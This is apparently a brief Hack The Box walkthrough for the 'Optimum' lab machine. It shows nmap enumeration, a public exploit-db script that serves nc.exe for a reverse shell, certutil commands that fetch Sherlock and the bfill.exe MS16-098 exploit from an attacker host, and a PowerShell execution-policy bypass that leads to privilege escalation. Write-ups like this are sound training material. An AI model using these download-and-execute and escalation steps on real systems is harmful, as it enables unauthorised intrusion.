# Optimum HTB

## Enumeration

* We use `nmap -p- -A -Pn 10.10.10.8` to enumerate:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-3cb0634f2933bf00027da89b450aa3e0c392ba25%2Fec15bca60a15214ce84e25bfdf5cb9c2.png?alt=media)
* We found a website:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-fb5b9bad06aaf8ba8fa633d21e1eee4c83b6ab5c%2Fb646d9528764eb0025f41cde0f628982.png?alt=media)

## Exploitation

* We used the exploit <https://www.exploit-db.com/exploits/39161> we need nc.exe ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-ba675e9a1af5b3bf8912e0ce740e9eb662d3baf6%2Fec4b94d7a5013d5fbbbda03f1afd6b1b.png?alt=media)
* we can find it in /usr/share/windows-resources/binaries/nc.exe and paste it into our Downloads/optimum folder
* We modify the ip in the exploit file![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-aa13a894ffe85f062b4a8b24702dfc387eb5a7f3%2F5cd09758f6fdba139deca9a91f0ba02f.png?alt=media)
* `python3 -m http.server 80` and host our current directory for the nc.exe file
* We keep running the exploit with `python 39161.py 10.10.10.8 80` to get the shell:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-0e8bdde8046fea258587ee00433fb9f4950eaadf%2F17bf9c07ceb34a265c0248fb49202463.png?alt=media)
* Then we upload sherlock(<https://github.com/rasta-mouse/Sherlock>) using `certutil -urlcache -f http://10.10.14.25/sherlock.ps1 sherlock.ps1`
* Then use it to look for vulnerabilites using: `powershell.exe -exec bypass -Command "& {Import-Module .\sherlock.ps1; Find-AllVulns}"` : ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-7f38b86fb5f301c6abfb905c1c5b97f1c00e12a0%2Ffdac778fe513d4cdf0126d260eb1ac11.png?alt=media)
* We can also use wesng(<https://github.com/bitsadmin/wesng>)
* We use <https://github.com/sensepost/ms16-098/blob/master/bfill.exe> to get privilege escalation by uploading the file first `certutil -urlcache -f http://10.10.14.25/bfill.exe bfill.exe` and then executing it `bfill.exe`:![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-408d130ff4673abfbcb190b4d48d5ddf8ccceda6%2Fe7f399854085fbe8802369fbcf4a0098.png?alt=media) We get a root shell.